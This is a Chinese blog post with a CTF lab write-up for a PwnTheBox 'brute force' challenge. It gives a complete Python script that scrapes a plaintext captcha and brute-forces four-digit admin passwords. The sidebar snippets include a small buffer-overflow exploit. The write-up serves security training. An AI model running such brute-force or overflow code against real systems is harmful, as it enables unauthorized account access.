writeup PwnTheBox baopo

最新推荐文章于 2022-06-05 00:37:09 发布
最新推荐文章于 2022-06-05 00:37:09 发布
阅读量329 收藏 1
点赞数
分类专栏: web安全 writeup 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kinnisoy/article/details/120986102
版权

题目描述:
在这里插入图片描述
根据题目,知道本题考察点为爆破。

在这里插入图片描述
打开靶机,发现一个登录界面,随便登陆一下,告诉了我们用户名,且验证码为纯文本,且在响应数据包中可直接获取。那么只需要爆破密码就行,
在这里插入图片描述

PS:经过测试,验证码由服务器生成,每次动态改变,burp爆破验证码这里有点不懂,遂直接用python实现,有了解的可以评论区告诉我一下。

F12大法好,一下发现两个关键点,验证码密码格式
所以下面分为两步:

  1. 从数据包中解析出验证码
  2. 发包进行爆破

解析验证码的代码如下:

def get_code(response):
	#考虑到里面有很多br标签,便使用标签的括号,匹配其中的五个字符
    pattern1 = re.compile(r">[0-9a-z]{5}<")
    code_ = pattern1.findall(str(response.text))
    #再从中提取出验证码
    pattern = re.compile(r"[0-9a-z]{5}")
    code = pattern.findall(str(code_))
    code = str(code[0])
    return code

爆破就比较简单了,通过分析数据包,发现请求格式为:https://xxxxxxxx.do-not-trust.hacking.run/index.php?username=admin&password=1234&randcode=68e8e
我们只需要拼接验证码进来,并且将密码修改为四位纯数字进行爆破。
完整代码如下:

import requests
import re

def get_code(response):
    pattern1 = re.compile(r">[0-9a-z]{5}<")
    code_ = pattern1.findall(str(response.text))
    pattern = re.compile(r"[0-9a-z]{5}")
    code = pattern.findall(str(code_))
    code = str(code[0])
    return code

def find_success(response):
    data = '密码错误'
    try:
        result = re.search(r'密码错误',response.text).group(0)
        if result==data:
            return False
        else:
            return True
    except:
        return True

for passwd in range(0000,9999):
    req = requests.session()
    url = 'https://277xxxxxxxxxxxxx.do-not-trust.hacking.run/'
    r = req.get(url)
    code = get_code(r)
    password = "%04d" % passwd
    password = str(password)
    path = '/index.php?username=admin&password='+password+'&randcode='+code
    url2 = url+path
    rev = req.get(url2)
    if find_success(rev):
        print("Password: ",password)
        print("Received: ",rev.text)
        break

运行之后,爆破出结果会直接输出响应包内容和正确密码,如下:
在这里插入图片描述

可以去尝试登陆,也能get到flag
在这里插入图片描述

kinnisoy
关注
专栏目录
Pwn The Box——easysql
龙狼刺的博客
08-14 887
easysql。
writeup PwnTheBox hash
The code way of kinnisoy
10-27 396
将请求头中Cookie的source改为1,得到源代码~ @error_reporting(0); $flag = "flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxx}"; $secret_key = "xxxxxxxxxxxxxxxx"; // the key is safe! no one can know except me $username = $_POST["username"]; $password = $_POST["password"]; header("hash_ke
PwnTheBox
硫酸超的博客
11-30 982
靶场地址 右键查看源代码 <html> <head> <title>Welcome to PwnTheBox</title> <meta charset="utf-8"> </head> <body> <h3 align="center">欢迎来到PwnTheBox大学</h3> <p>PwnTheBox大学(PwnTheBox University)简称PTB,建校于5YWs5Y
pwnthebox-rip
CHAWUCIREN1的博客
12-02 2604
gets函数不限制输入的长度,存在溢出 查看栈空间,payload = 0xf + 8 发现fun()函数, 构造exp from pwn import * p = process('pwn1') #p = remote('redirect.do-not-trust.hacking.run',10026) payload = b'A'*0xF+ p64(0x401186) p.sendline(payload) p.interactive() ...
PwnTheBox,Web:信息安全 2077
Pai_Space
06-05 220
2019 hackgame
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
Writeup.rar
12-01
标题 "Writeup.rar" 暗示这可能是一个关于技术分析或解决问题的文档集合,可能是某项编程竞赛、课程作业或者编程挑战的解决方案。描述中同样提到 "Writeup.rar",意味着这个压缩包可能包含了对某个问题或项目的详细...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
pwnbox:有关如何创建自己的Pwnbox(最初由HTB创建)的说明
05-10
Pwnbox 对于使用Kali的用户,我在底部添加了一些步骤以在2020.3中获得新的zsh终端,以显示您的服务器/ IP 是否想复制Hack Box自己的Pwnbox? 请遵循以下指南! 这应该为您提供Hack The Box使用的pwnbox的“外观”。 此处显示的所有内容都可以在您自己的Parrot OS中完成,无论是VM还是主OS。 但是,我建议您研究每个命令的功能,执行的位置以及如何根据自己的喜好自定义它。 对我来说,每当我进入Parrot机器时,它就会带给我有趣的hackthebox徽标。 继续,自己做吧! █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█
pwn the box睿智题目
zoixsoadji的博客
02-26 329
撰解工具:burp suite 进入靶机,发现页面一直跳,用burp抓包试试看 将这个包发至重发模块(右键 send to repeater) 再重发模块中,查看源码发现有‘flag is here’ 继续发包,多发几次flag就出来了 ...
PwnTheBox(web篇)---easysql
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-03 2192
文章目录PwnTheBox(web篇)---easysql PwnTheBox(web篇)—easysql
pwnthebox pwn ciscn_2019_n_1 wp
weixin_49436541的博客
03-13 476
ciscn_2019 pwn
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 3063
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
pwnthebox刷题(ereg截断函数&某py request脚本)
weixin_63231007的博客
05-17 495
[pwnthebox] 对方不想和你说话,并向你扔了一段代码 php中extract()函数存在变量覆盖漏洞,所以讲url后面加上 /?a=&b=,$a和$b变量内容为空字符串造成两个的值相等,或者直接就 /a= ,也行。得到flag。 [pwnthebox] 你给我一个满意的数字,我就给你flag! 查看源码,发现index.php.txt.访问得到了源码: 审计后发现,需要满足: if (isset ( $_POST ['num'] )) { if (@ereg ( "^[1-
PwnTheBox,Web:猫咪银行
Pai_Space
06-05 299
2018 hackgame 整数溢出
PwnTheBox--快速计算
Dream'
03-01 1112
一、问题描述 打开题目之后,要求3秒之内计算一个式子,我们过三秒再刷新发现式子就发生了变化,这道题手算是不太可能了,考虑别的方法。 二、解决问题 使用python解决问题的大概思路如下: (1)先创建一个session对象。(因为计算出结果后需要再次发送数据,而session对象可以保留会话,第二次发送时带上第一次时的消息头) s = requests.Session() (2)使用session对象访问题目地址,并从中提取出需要计算的表达式。 r = s.get('http://11
PwnTheBox(web篇)---ezphp
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-08 834
文章目录PwnTheBox(web篇)---ezphp题目题解 PwnTheBox(web篇)—ezphp 题目 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kinnisoy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值